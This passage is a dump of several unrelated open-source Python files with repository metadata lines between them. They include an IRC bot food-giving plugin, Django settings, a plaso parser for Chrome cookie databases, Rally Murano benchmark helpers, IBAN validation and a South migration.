with codecs.open(os.path.join(bot.data_dir, "pancake.json"), encoding="utf-8") as f:
pancake_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "chicken.json"), encoding="utf-8") as f:
chicken_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "brekkie.json"), encoding="utf-8") as f:
brekkie_data = json.load(f)
with codecs.open(os.path.join(bot.data_dir, "icecream.json"), encoding="utf-8") as f:
icecream_data = json.load(f)
@asyncio.coroutine
@hook.command
def potato(text, action):
"""<user> - makes <user> a tasty little potato"""
user = text.strip()
if not is_valid(user):
return "I can't give a potato to that user."
potato_type = random.choice(potatoes)
size = random.choice(['small', 'little', 'mid-sized', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['bakes', 'fries', 'boils', 'roasts'])
side_dish = random.choice(['side salad', 'dollop of sour cream', 'piece of chicken', 'bowl of shredded bacon'])
action("{} a {} {} {} potato for {} and serves it with a small {}!".format(method, flavor, size, potato_type, user,
side_dish))
@asyncio.coroutine
@hook.command
def cake(text, action):
"""<user> - gives <user> an awesome cake"""
user = text.strip()
if not is_valid(user):
return "I can't give a cake to that user."
cake_type = random.choice(cakes)
size = random.choice(['small', 'little', 'mid-sized', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['makes', 'gives', 'gets', 'buys'])
side_dish = random.choice(['glass of chocolate milk', 'bowl of ice cream', 'jar of cookies',
'side of chocolate sauce'])
action("{} {} a {} {} {} cake and serves it with a small {}!".format(method, user, flavor, size, cake_type,
side_dish))
@asyncio.coroutine
@hook.command
def cookie(text, action):
"""<user> - gives <user> a cookie"""
user = text.strip()
if not is_valid(user):
return "I can't give a cookie to that user."
cookie_type = random.choice(cookies)
size = random.choice(['small', 'little', 'medium-sized', 'large', 'gigantic'])
flavor = random.choice(['tasty', 'delectable', 'delicious', 'yummy', 'toothsome', 'scrumptious', 'luscious'])
method = random.choice(['makes', 'gives', 'gets', 'buys'])
side_dish = random.choice(['glass of milk', 'bowl of ice cream', 'bowl of chocolate sauce'])
action("{} {} a {} {} {} cookie and serves it with a {}!".format(method, user, flavor, size, cookie_type,
side_dish))
@asyncio.coroutine
@hook.command
def sandwich(text, action):
"""<user> - give a tasty sandwich to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give a sandwich to that user."
generator = textgen.TextGenerator(sandwich_data["templates"], sandwich_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def taco(text, action):
"""<user> - give a taco to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give a taco to that user."
generator = textgen.TextGenerator(taco_data["templates"], taco_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def drink(text, action):
"""<user> - give a drink to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give drinks to that user."
r = random.randint(1,2)
if r == 1:
generator = textgen.TextGenerator(coffee_data["templates"], coffee_data["parts"],
variables={"user": user})
else:
generator = textgen.TextGenerator(tea_data["templates"], tea_data["parts"],
variables={"user": user})
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def coffee(text, action):
"""<user> - give coffee to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give coffee to that user."
generator = textgen.TextGenerator(coffee_data["templates"], coffee_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
asyncio.coroutine
@hook.command
def noodles(text, action):
"""<user> - give noodles to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give noodles to that user."
generator = textgen.TextGenerator(noodles_data["templates"], noodles_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
asyncio.coroutine
@hook.command
def muffin(text, action):
"""<user> - give muffin to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give muffin to that user."
generator = textgen.TextGenerator(muffin_data["templates"], muffin_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def tea(text, action):
"""<user> - give tea to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give tea to that user."
generator = textgen.TextGenerator(tea_data["templates"], tea_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def keto(text, action):
"""<user> - give keto food to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give food to that user."
generator = textgen.TextGenerator(keto_data["templates"], keto_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def cheese(text, action):
"""<user> - give cheese to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give cheese to that user."
generator = textgen.TextGenerator(cheese_data["templates"], cheese_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def pancake(text, action):
"""<user> - give pancakes to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give pancakes to that user."
generator = textgen.TextGenerator(pancake_data["templates"], pancake_data["parts"],
variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def chicken(text, action):
"""<user> - give pancakes to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give pancakes to that user."
generator = textgen.TextGenerator(chicken_data["templates"], chicken_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command
def icecream(text, action):
"""<user> - give icecream to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give icecream to that user."
generator = textgen.TextGenerator(icecream_data["templates"], icecream_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string())
@asyncio.coroutine
@hook.command("brekky", "brekkie")
def brekkie(text, action):
"""<user> - give brekkie to <user>"""
user = text.strip()
if not is_valid(user):
return "I can't give brekkie to that user."
generator = textgen.TextGenerator(brekkie_data["templates"], brekkie_data["parts"], variables={"user": user})
# act out the message
action(generator.generate_string()) | gpl-3.0 | -8,647,342,310,235,884,000 | 39.379213 | 120 | 0.599416 | false |
berlotto/bolao-futebol | bolao/settings.py | 1 | 2001 | """
Django settings for bolao project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '5zhqg$4=*=24(7u(mj^-hn-#eg!k21i75&j9kg)*xz4*8$(_)s'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'apostas',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
)
ROOT_URLCONF = 'bolao.urls'
WSGI_APPLICATION = 'bolao.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'pt-br'
TIME_ZONE = 'America/Sao_Paulo'
USE_I18N = False
USE_L10N = False
USE_TZ = False
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
| lgpl-3.0 | -7,687,704,100,187,002,000 | 23.108434 | 71 | 0.718141 | false |
Onager/plaso | plaso/parsers/sqlite_plugins/chrome_cookies.py | 1 | 8029 | # -*- coding: utf-8 -*-
"""SQLite parser plugin for Google Chrome cookies database files."""
from dfdatetime import webkit_time as dfdatetime_webkit_time
from plaso.containers import events
from plaso.containers import time_events
from plaso.lib import definitions
# Register the cookie plugins.
from plaso.parsers import cookie_plugins # pylint: disable=unused-import
from plaso.parsers import sqlite
from plaso.parsers.cookie_plugins import manager as cookie_plugins_manager
from plaso.parsers.sqlite_plugins import interface
class ChromeCookieEventData(events.EventData):
"""Chrome Cookie event data.
Attributes:
cookie_name (str): name of the cookie.
host (str): hostname of host that set the cookie value.
httponly (bool): True if the cookie cannot be accessed through client
side script.
path (str): path where the cookie got set.
persistent (bool): True if the cookie is persistent.
secure (bool): True if the cookie should only be transmitted over a
secure channel.
url (str): URL or path where the cookie got set.
data (str): value of the cookie.
"""
DATA_TYPE = 'chrome:cookie:entry'
def __init__(self):
"""Initializes event data."""
super(ChromeCookieEventData, self).__init__(data_type=self.DATA_TYPE)
self.cookie_name = None
self.data = None
self.host = None
self.httponly = None
self.path = None
self.persistent = None
self.secure = None
self.url = None
class BaseChromeCookiePlugin(interface.SQLitePlugin):
"""SQLite parser plugin for Google Chrome cookies database files."""
# Point to few sources for URL information.
URLS = [
'http://src.chromium.org/svn/trunk/src/net/cookies/',
('http://www.dfinews.com/articles/2012/02/'
'google-analytics-cookies-and-forensic-implications')]
# Google Analytics __utmz variable translation.
# Taken from:
# http://www.dfinews.com/sites/dfinews.com/files/u739/Tab2Cookies020312.jpg
GA_UTMZ_TRANSLATION = {
'utmcsr': 'Last source used to access.',
'utmccn': 'Ad campaign information.',
'utmcmd': 'Last type of visit.',
'utmctr': 'Keywords used to find site.',
'utmcct': 'Path to the page of referring link.'}
def __init__(self):
"""Initializes a plugin."""
super(BaseChromeCookiePlugin, self).__init__()
self._cookie_plugins = (
cookie_plugins_manager.CookiePluginsManager.GetPlugins())
def ParseCookieRow(self, parser_mediator, query, row, **unused_kwargs):
"""Parses a cookie row.
Args:
parser_mediator (ParserMediator): parser mediator.
query (str): query that created the row.
row (sqlite3.Row): row resulting from the query.
"""
query_hash = hash(query)
cookie_name = self._GetRowValue(query_hash, row, 'name')
cookie_data = self._GetRowValue(query_hash, row, 'value')
hostname = self._GetRowValue(query_hash, row, 'host_key')
if hostname.startswith('.'):
hostname = hostname[1:]
httponly = self._GetRowValue(query_hash, row, 'httponly')
path = self._GetRowValue(query_hash, row, 'path')
persistent = self._GetRowValue(query_hash, row, 'persistent')
secure = self._GetRowValue(query_hash, row, 'secure')
if secure:
scheme = 'https'
else:
scheme = 'http'
url = '{0:s}://{1:s}{2:s}'.format(scheme, hostname, path)
event_data = ChromeCookieEventData()
event_data.cookie_name = cookie_name
event_data.data = cookie_data
event_data.host = hostname
event_data.httponly = bool(httponly)
event_data.path = path
event_data.persistent = bool(persistent)
event_data.query = query
event_data.secure = bool(secure)
event_data.url = url
timestamp = self._GetRowValue(query_hash, row, 'creation_utc')
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_CREATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
timestamp = self._GetRowValue(query_hash, row, 'last_access_utc')
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_LAST_ACCESS)
parser_mediator.ProduceEventWithEventData(event, event_data)
timestamp = self._GetRowValue(query_hash, row, 'expires_utc')
if timestamp:
date_time = dfdatetime_webkit_time.WebKitTime(timestamp=timestamp)
event = time_events.DateTimeValuesEvent(
date_time, definitions.TIME_DESCRIPTION_EXPIRATION)
parser_mediator.ProduceEventWithEventData(event, event_data)
for plugin in self._cookie_plugins:
if cookie_name != plugin.COOKIE_NAME:
continue
try:
plugin.UpdateChainAndProcess(
parser_mediator, cookie_data=cookie_data, cookie_name=cookie_name,
url=url)
except Exception as exception: # pylint: disable=broad-except
parser_mediator.ProduceExtractionWarning(
'plugin: {0:s} unable to parse cookie with error: {1!s}'.format(
plugin.NAME, exception))
class Chrome17CookiePlugin(BaseChromeCookiePlugin):
"""SQLite parser plugin for Google Chrome 17 - 65 cookies database files."""
NAME = 'chrome_17_cookies'
DATA_FORMAT = 'Google Chrome 17 - 65 cookies SQLite database file'
REQUIRED_STRUCTURE = {
'cookies': frozenset([
'creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc',
'secure', 'httponly', 'last_access_utc', 'has_expires',
'persistent']),
'meta': frozenset([])}
QUERIES = [
(('SELECT creation_utc, host_key, name, value, path, expires_utc, '
'secure, httponly, last_access_utc, has_expires, persistent '
'FROM cookies'), 'ParseCookieRow')]
SCHEMAS = [{
'cookies': (
'CREATE TABLE cookies (creation_utc INTEGER NOT NULL UNIQUE PRIMARY '
'KEY, host_key TEXT NOT NULL, name TEXT NOT NULL, value TEXT NOT '
'NULL, path TEXT NOT NULL, expires_utc INTEGER NOT NULL, secure '
'INTEGER NOT NULL, httponly INTEGER NOT NULL, last_access_utc '
'INTEGER NOT NULL, has_expires INTEGER DEFAULT 1, persistent '
'INTEGER DEFAULT 1)'),
'meta': (
'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, '
'value LONGVARCHAR)')}]
class Chrome66CookiePlugin(BaseChromeCookiePlugin):
"""SQLite parser plugin for Google Chrome 66+ cookies database files."""
NAME = 'chrome_66_cookies'
DATA_FORMAT = 'Google Chrome 66 and later cookies SQLite database file'
REQUIRED_STRUCTURE = {
'cookies': frozenset([
'creation_utc', 'host_key', 'name', 'value', 'path', 'expires_utc',
'is_secure', 'is_httponly', 'last_access_utc', 'has_expires',
'is_persistent']),
'meta': frozenset([])}
QUERIES = [
(('SELECT creation_utc, host_key, name, value, path, expires_utc, '
'is_secure AS secure, is_httponly AS httponly, last_access_utc, '
'has_expires, is_persistent AS persistent '
'FROM cookies'), 'ParseCookieRow')]
SCHEMAS = [{
'cookies': (
'CREATE TABLE cookies (creation_utc INTEGER NOT NULL, host_key TEXT '
'NOT NULL, name TEXT NOT NULL, value TEXT NOT NULL, path TEXT NOT '
'NULL, expires_utc INTEGER NOT NULL, is_secure INTEGER NOT NULL, '
'is_httponly INTEGER NOT NULL, last_access_utc INTEGER NOT NULL, '
'has_expires INTEGER NOT NULL DEFAULT 1, is_persistent INTEGER NOT '
'NULL DEFAULT 1, priority INTEGER NOT NULL DEFAULT 1, '
'encrypted_value BLOB DEFAULT \'\', firstpartyonly INTEGER NOT NULL '
'DEFAULT 0, UNIQUE (host_key, name, path))'),
'meta': (
'CREATE TABLE meta(key LONGVARCHAR NOT NULL UNIQUE PRIMARY KEY, '
'value LONGVARCHAR)')}]
sqlite.SQLiteParser.RegisterPlugins([
Chrome17CookiePlugin, Chrome66CookiePlugin])
| apache-2.0 | -3,767,058,547,770,239,000 | 36.872642 | 79 | 0.668078 | false |
jonatascastro12/django-dashboard_view | django_select2_extension/fields.py | 1 | 3839 | from django.db.models.query_utils import Q
from django.forms.models import ModelChoiceIterator
from django_select2.fields import ChoiceMixin, AutoModelSelect2MultipleField, AutoModelSelect2Field
from django_select2_extension.widgets import AutoPhotoHeavySelect2MultipleWidget, AutoPhotoHeavySelect2Widget
class FilterableAdvancedModelChoiceIterator(ModelChoiceIterator):
"""
Extends ModelChoiceIterator to add the capability to apply additional
filter on the passed queryset and also return the obj instance.
"""
def choice(self, obj):
return (self.field.prepare_value(obj), self.field.label_from_instance(obj), obj)
def set_extra_filter(self, **filter_map):
"""
Applies additional filter on the queryset. This can be called multiple times.
:param filter_map: The ``**kwargs`` to pass to :py:meth:`django.db.models.query.QuerySet.filter`.
If this is not set then additional filter (if) applied before is removed.
"""
if not hasattr(self, '_original_queryset'):
import copy
self._original_queryset = copy.deepcopy(self.queryset)
if filter_map:
self.queryset = self._original_queryset.filter(**filter_map)
else:
self.queryset = self._original_queryset
class QuerysetAdvancedChoiceMixin(ChoiceMixin):
"""
Overrides ``choices``' getter to return instance of :py:class:`.FilterableAdvancedModelChoiceIterator`
instead.
"""
def _get_choices(self):
# If self._choices is set, then somebody must have manually set
# the property self.choices. In this case, just return self._choices.
if hasattr(self, '_choices'):
return self._choices
# Otherwise, execute the QuerySet in self.queryset to determine the
# choices dynamically. Return a fresh ModelChoiceIterator that has not been
# consumed. Note that we're instantiating a new ModelChoiceIterator *each*
# time _get_choices() is called (and, thus, each time self.choices is
# accessed) so that we can ensure the QuerySet has not been consumed. This
# construct might look complicated but it allows for lazy evaluation of
# the queryset.
return FilterableAdvancedModelChoiceIterator(self)
choices = property(_get_choices, ChoiceMixin._set_choices)
def __deepcopy__(self, memo):
result = super(QuerysetAdvancedChoiceMixin, self).__deepcopy__(memo)
# Need to force a new ModelChoiceIterator to be created, bug #11183
result.queryset = result.queryset
return result
def prepare_qs_params(self, request, search_term, search_fields):
q = None
for field in search_fields:
kwargs = {}
search_term = search_term.strip()
if " " in search_term:
splitted_terms = search_term.split(" ")
for term in splitted_terms:
kwargs[field] = term
if q is None:
q = Q(**kwargs)
else:
q = q | Q(**kwargs)
else:
kwargs[field] = search_term
if q is None:
q = Q(**kwargs)
else:
q = q | Q(**kwargs)
return {'or': [q], 'and': {}}
class AutoPhotoModelSelect2Field(QuerysetAdvancedChoiceMixin, AutoModelSelect2Field):
widget = AutoPhotoHeavySelect2Widget
def extra_data_from_instance(self, obj):
return {'photo': obj.get_small_thumbnail()}
class AutoPhotoModelSelect2MultipleField(QuerysetAdvancedChoiceMixin, AutoModelSelect2MultipleField):
widget = AutoPhotoHeavySelect2MultipleWidget
def extra_data_from_instance(self, obj):
return {'photo': obj.get_small_thumbnail()} | gpl-2.0 | -1,333,794,018,231,232,500 | 41.197802 | 109 | 0.648085 | false |
rh-lab-q/conflab | wsgi/openshift/confla/utils.py | 1 | 1275 | import os
from django.core.exceptions import ValidationError
from django.utils.translation import ugettext as _
from django.utils.deconstruct import deconstructible
@deconstructible
class ConfRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.url_id, ext)
return os.path.join(self.path, filename)
@deconstructible
class UserRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.username, ext)
return os.path.join(self.path, filename)
@deconstructible
class PaperRenamePath(object):
def __init__(self, path):
self.path = path
def __call__(self, instance, filename):
ext = filename.split('.')[-1]
filename = '{}.{}'.format(instance.user.username, ext)
return os.path.join(path, filename)
splash_rename_and_return_path = ConfRenamePath('splash/')
icon_rename_and_return_path = ConfRenamePath('icon/')
user_rename_and_return_path = UserRenamePath('avatars/')
paper_rename_and_return_path = PaperRenamePath('papers/')
| gpl-3.0 | -7,650,763,214,364,231,000 | 28.651163 | 62 | 0.661176 | false |
group-policy/rally | rally/plugins/openstack/scenarios/murano/utils.py | 1 | 9884 | # Copyright 2015: Mirantis Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import os
import shutil
import tempfile
import uuid
import zipfile
from oslo_config import cfg
import yaml
from rally.common import fileutils
from rally.common import utils as common_utils
from rally.plugins.openstack import scenario
from rally.task import atomic
from rally.task import utils
CONF = cfg.CONF
MURANO_BENCHMARK_OPTS = [
cfg.IntOpt("murano_deploy_environment_timeout", default=1200,
deprecated_name="deploy_environment_timeout",
help="A timeout in seconds for an environment deploy"),
cfg.IntOpt("murano_deploy_environment_check_interval", default=5,
deprecated_name="deploy_environment_check_interval",
help="Deploy environment check interval in seconds"),
]
benchmark_group = cfg.OptGroup(name="benchmark", title="benchmark options")
CONF.register_opts(MURANO_BENCHMARK_OPTS, group=benchmark_group)
class MuranoScenario(scenario.OpenStackScenario):
"""Base class for Murano scenarios with basic atomic actions."""
@atomic.action_timer("murano.list_environments")
def _list_environments(self):
"""Return environments list."""
return self.clients("murano").environments.list()
@atomic.action_timer("murano.create_environment")
def _create_environment(self):
"""Create environment.
:param env_name: String used to name environment
:returns: Environment instance
"""
env_name = self.generate_random_name()
return self.clients("murano").environments.create({"name": env_name})
@atomic.action_timer("murano.delete_environment")
def _delete_environment(self, environment):
"""Delete given environment.
Return when the environment is actually deleted.
:param environment: Environment instance
"""
self.clients("murano").environments.delete(environment.id)
@atomic.action_timer("murano.create_session")
def _create_session(self, environment_id):
"""Create session for environment with specific id
:param environment_id: Environment id
:returns: Session instance
"""
return self.clients("murano").sessions.configure(environment_id)
@atomic.optional_action_timer("murano.create_service")
def _create_service(self, environment, session, full_package_name,
image_name=None, flavor_name=None):
"""Create Murano service.
:param environment: Environment instance
:param session: Session instance
:param full_package_name: full name of the Murano package
:param image_name: Image name
:param flavor_name: Flavor name
:param atomic_action: True if this is atomic action. added and
handled by the optional_action_timer()
decorator
:returns: Service instance
"""
app_id = str(uuid.uuid4())
data = {"?": {"id": app_id,
"type": full_package_name},
"name": self.generate_random_name()}
return self.clients("murano").services.post(
environment_id=environment.id, path="/", data=data,
session_id=session.id)
@atomic.action_timer("murano.deploy_environment")
def _deploy_environment(self, environment, session):
"""Deploy environment.
:param environment: Environment instance
:param session: Session instance
"""
self.clients("murano").sessions.deploy(environment.id,
session.id)
config = CONF.benchmark
utils.wait_for(
environment, is_ready=utils.resource_is("READY"),
update_resource=utils.get_from_manager(["DEPLOY FAILURE"]),
timeout=config.murano_deploy_environment_timeout,
check_interval=config.murano_deploy_environment_check_interval
)
@atomic.action_timer("murano.list_packages")
def _list_packages(self, include_disabled=False):
"""Returns packages list.
:param include_disabled: if "True" then disabled packages will be
included in a the result.
Default value is False.
:returns: list of imported packages
"""
return self.clients("murano").packages.list(
include_disabled=include_disabled)
@atomic.action_timer("murano.import_package")
def _import_package(self, package):
"""Import package to the Murano.
:param package: path to zip archive with Murano application
:returns: imported package
"""
package = self.clients("murano").packages.create(
{}, {"file": open(package)}
)
return package
@atomic.action_timer("murano.delete_package")
def _delete_package(self, package):
"""Delete specified package.
:param package: package that will be deleted
"""
self.clients("murano").packages.delete(package.id)
@atomic.action_timer("murano.update_package")
def _update_package(self, package, body, operation="replace"):
"""Update specified package.
:param package: package that will be updated
:param body: dict object that defines what package property will be
updated, e.g {"tags": ["tag"]} or {"enabled": "true"}
:param operation: string object that defines the way of how package
property will be updated, allowed operations are
"add", "replace" or "delete".
Default value is "replace".
:returns: updated package
"""
return self.clients("murano").packages.update(
package.id, body, operation)
@atomic.action_timer("murano.filter_applications")
def _filter_applications(self, filter_query):
"""Filter list of uploaded application by specified criteria.
:param filter_query: dict that contains filter criteria, it
will be passed as **kwargs to filter method
e.g. {"category": "Web"}
:returns: filtered list of packages
"""
return self.clients("murano").packages.filter(**filter_query)
def _zip_package(self, package_path):
"""Call _prepare_package method that returns path to zip archive."""
return MuranoPackageManager(self.task)._prepare_package(package_path)
class MuranoPackageManager(common_utils.RandomNameGeneratorMixin):
RESOURCE_NAME_FORMAT = "app.rally_XXXXXXXX_XXXXXXXX"
def __init__(self, task):
self.task = task
@staticmethod
def _read_from_file(filename):
with open(filename, "r") as f:
read_data = f.read()
return yaml.safe_load(read_data)
@staticmethod
def _write_to_file(data, filename):
with open(filename, "w") as f:
yaml.safe_dump(data, f)
def _change_app_fullname(self, app_dir):
"""Change application full name.
To avoid name conflict error during package import (when user
tries to import a few packages into the same tenant) need to change the
application name. For doing this need to replace following parts
in manifest.yaml
from
...
FullName: app.name
...
Classes:
app.name: app_class.yaml
to:
...
FullName: <new_name>
...
Classes:
<new_name>: app_class.yaml
:param app_dir: path to directory with Murano application context
"""
new_fullname = self.generate_random_name()
manifest_file = os.path.join(app_dir, "manifest.yaml")
manifest = self._read_from_file(manifest_file)
class_file_name = manifest["Classes"][manifest["FullName"]]
# update manifest.yaml file
del manifest["Classes"][manifest["FullName"]]
manifest["FullName"] = new_fullname
manifest["Classes"][new_fullname] = class_file_name
self._write_to_file(manifest, manifest_file)
def _prepare_package(self, package_path):
"""Check whether the package path is path to zip archive or not.
If package_path is not a path to zip archive but path to Murano
application folder, than method prepares zip archive with Murano
application. It copies directory with Murano app files to temporary
folder, changes manifest.yaml and class file (to avoid '409 Conflict'
errors in Murano) and prepares zip package.
:param package_path: path to zip archive or directory with package
components
:returns: path to zip archive with Murano application
"""
if not zipfile.is_zipfile(package_path):
tmp_dir = tempfile.mkdtemp()
pkg_dir = os.path.join(tmp_dir, "package/")
try:
shutil.copytree(package_path, pkg_dir)
self._change_app_fullname(pkg_dir)
package_path = fileutils.pack_dir(pkg_dir)
finally:
shutil.rmtree(tmp_dir)
return package_path
| apache-2.0 | -1,880,708,867,045,607,000 | 35.072993 | 79 | 0.625152 | false |
cgstudiomap/cgstudiomap | main/eggs/python_stdnum-1.2-py2.7.egg/stdnum/iban.py | 1 | 3897 | # iban.py - functions for handling International Bank Account Numbers (IBANs)
#
# Copyright (C) 2011, 2012, 2013 Arthur de Jong
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA
# 02110-1301 USA
"""IBAN (International Bank Account Number).
The IBAN is used to identify bank accounts across national borders. The
first two letters are a country code. The next two digits are check digits
for the ISO 7064 Mod 97, 10 checksum. Each country uses its own format
for the remainder of the number.
Some countries may also use checksum algorithms within their number but
this is currently not checked by this number.
>>> validate('GR16 0110 1050 0000 1054 7023 795')
'GR1601101050000010547023795'
>>> validate('BE31435411161155')
'BE31435411161155'
>>> compact('GR16 0110 1050 0000 1054 7023 795')
'GR1601101050000010547023795'
>>> format('GR1601101050000010547023795')
'GR16 0110 1050 0000 1054 7023 795'
"""
import re
from stdnum import numdb
from stdnum.exceptions import *
from stdnum.iso7064 import mod_97_10
from stdnum.util import clean
# our open copy of the IBAN database
_ibandb = numdb.get('iban')
# the valid characters we have
_alphabet = '0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ'
# regular expression to check IBAN structure
_struct_re = re.compile(r'([1-9][0-9]*)!([nac])')
def compact(number):
"""Convert the iban number to the minimal representation. This strips the
number of any valid separators and removes surrounding whitespace."""
return clean(number, ' -').strip().upper()
def _to_base10(number):
"""Prepare the number to its base10 representation (also moving the
check digits to the end) so it can be checked with the ISO 7064
Mod 97, 10 algorithm."""
# TODO: find out whether this should be in the mod_97_10 module
return ''.join(str(_alphabet.index(x)) for x in number[4:] + number[:4])
def _struct_to_re(structure):
"""Convert an IBAN structure to a refular expression that can be used
to validate the number."""
def conv(match):
chars = {
'n': '[0-9]',
'a': '[A-Z]',
'c': '[A-Za-z0-9]',
}[match.group(2)]
return '%s{%s}' % (chars, match.group(1))
return re.compile('^%s$' % _struct_re.sub(conv, structure))
def validate(number):
"""Checks to see if the number provided is a valid IBAN."""
number = compact(number)
try:
test_number = _to_base10(number)
except Exception:
raise InvalidFormat()
# ensure that checksum is valid
mod_97_10.validate(test_number)
# look up the number
info = _ibandb.info(number)
# check if the bban part of number has the correct structure
bban = number[4:]
if not _struct_to_re(info[0][1].get('bban', '')).match(bban):
raise InvalidFormat()
# return the compact representation
return number
def is_valid(number):
"""Checks to see if the number provided is a valid IBAN."""
try:
return bool(validate(number))
except ValidationError:
return False
def format(number, separator=' '):
"""Reformat the passed number to the space-separated format."""
number = compact(number)
return separator.join(number[i:i + 4] for i in range(0, len(number), 4))
| agpl-3.0 | -2,954,733,184,539,268,600 | 32.886957 | 77 | 0.699769 | false |
mysociety/manchester-survey | survey/migrations/0003_auto__chg_field_user_email.py | 1 | 1991 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'User.email'
db.alter_column(u'survey_user', 'email', self.gf('django.db.models.fields.TextField')(unique=True, null=True))
def backwards(self, orm):
# Changing field 'User.email'
db.alter_column(u'survey_user', 'email', self.gf('django.db.models.fields.TextField')(default='', unique=True))
models = {
u'survey.item': {
'Meta': {'object_name': 'Item'},
'batch': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'key': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'site': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['survey.User']"}),
'value': ('django.db.models.fields.TextField', [], {'db_index': 'True'}),
'whenstored': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'})
},
u'survey.secret': {
'Meta': {'object_name': 'Secret'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'secret': ('django.db.models.fields.TextField', [], {})
},
u'survey.user': {
'Meta': {'object_name': 'User'},
'code': ('django.db.models.fields.TextField', [], {'unique': 'True', 'db_index': 'True'}),
